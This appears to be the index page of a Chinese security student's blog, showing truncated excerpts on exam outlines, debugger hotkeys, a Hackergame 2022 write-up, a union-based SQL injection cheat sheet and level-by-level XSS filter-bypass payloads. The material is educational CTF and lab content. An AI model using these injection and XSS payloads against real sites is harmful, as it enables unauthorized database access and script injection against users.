haorical的博客

自用 山海经石王 15 金石 破云 123331223612333122361233312236123331223612333122361233312236123331223612333122361233312236123331223612333122361233312236123331223612333122361233312236123331223612333122361233312236123331223612333122361233312236123331223612333122361233312236123331223612333122361233312236123331223612333122361233312236123331223612333122361233312236123331223612333122361233312236123331223612333122361233312236123331223612333122361233312236123331223612333122361233312236123331223612333122361233312236 ...

原博客链接：https://blog.haorical.top误删了之前的所有文章，没完全恢复，导致原来的博客不能push了 还好github可以回滚到之前的最后一个版本，文章都还在，搜索也能用 重新搭了一个，顺便换了个主题，以后就在这写了

选择 15课后题原题 简答题 25 安全策略 意义 安全服务 黑客攻击流程 反射xss FIN扫描 论述题 30 TCP劫持 防御 挑战响应机制 缓冲区 溢出 防御 代码分析 20<?php $username = $_GET['username']; echo $username; mysqli_query("select * from user where username = '$username'") 存在漏洞 原理 防御

常用判断列数-1 union select 1, 2, 3# 不断增加序号，来试回显位置，列数不匹配会报错The used SELECT statements have a different number of columns -1 order by 1, 2, 3# order by超过列数会报错Unknown column '4' in 'order clause'，小于等于列数不报错，增加序号确定列数 获取库名-1 union select database(), 2, 3#-1 union select 1, 2, group_concat(schema_name) from information_schema.schemata# 获取表名-1 union select 1, 2, group_concat(table_name) from information_schema.tables where table_schema='test'# 获取列名-1 union select 1, 2, group_con ...

前言考的很简单，目测比19级简单的多，更偏向于18级的题目难度。而且没有考第二章信息熵和第八章数字签名的内容。 简答题 30分 画Feistel网络结构 md5填充 求密钥空间 数游程个数 AES 子密钥总比特数 密钥生成方法 DES s盒代换 分析题 30分 仿射密码解密 GF域乘法 0xC1*0x02 RSA 求d 解密求明文 论述题 20分 DES证明题 画CBC解密结构图 lfsr给生成多项式 求f 画寄存器 求输出序列、周期 综合题 20分给了Elgamal算法的加解密公式。 公钥、私钥分别是什么 正确性验证 加解密计算

F7 步进F8 步过Ctrl+F9 运行函数直到retnCtrl+F2 重新调试F7 + Ctrl+F9 + F7 基础连招Ctrl+G 跳到指定地址F4 执行到光标位置: 标签; 注释可右键查看F2 断点F9 运行* EIP位置- 上一个光标位置Enter 进入跳转（不运行时）

官方wp: https://github.com/USTC-Hackergame/hackergame2022-writeups 杂项猫咪问答利用ssh key finger查找域名，这里使用Shodan github 仓库内搜索 猜数字java真随机数，无法预测下一个 这题考察的是浮点数的比较，对于任意a，a != NaN成立，但 a < NaN 或 NaN < a均不成立，再根据判断逻辑，直接传NaN即可 webLaTeX 机器人https://github.com/swisskyrepo/PayloadsAllTheThings，包含各种payload 使用了pdflatex工具，但是禁掉了write18 pdflatex -interaction=nonstopmode -halt-on-error -no-shell-escape result.tex 读取本地文件，input有特殊字符会报错，这里用逐字包含，或者其它的很多解法 % verbatim包，没复现成功$$ \makeatletter这里放 verbatim.sty 的内容，记得删掉行末的 % ...

d 汇编转数据c 数据转汇编p 汇编界面声明函数

level1<img src=1 onerror=alert('1')> level2 闭合 "/><img src=1 onerror=alert(1)> level3 过滤< > ' onfocus=javascript:alert('xss') class=' level4" onfocus=javascript:alert('xss') class=" level5 过滤事件 onfocus/script 等关键字 添加_干扰 "> <a href=javascript:alert('xss')>xss</a> // level6 过滤href 大写绕过 "> <a Href=javascript:alert('xss')>xss</a> // level7 直接删除关键字 双写绕过 ...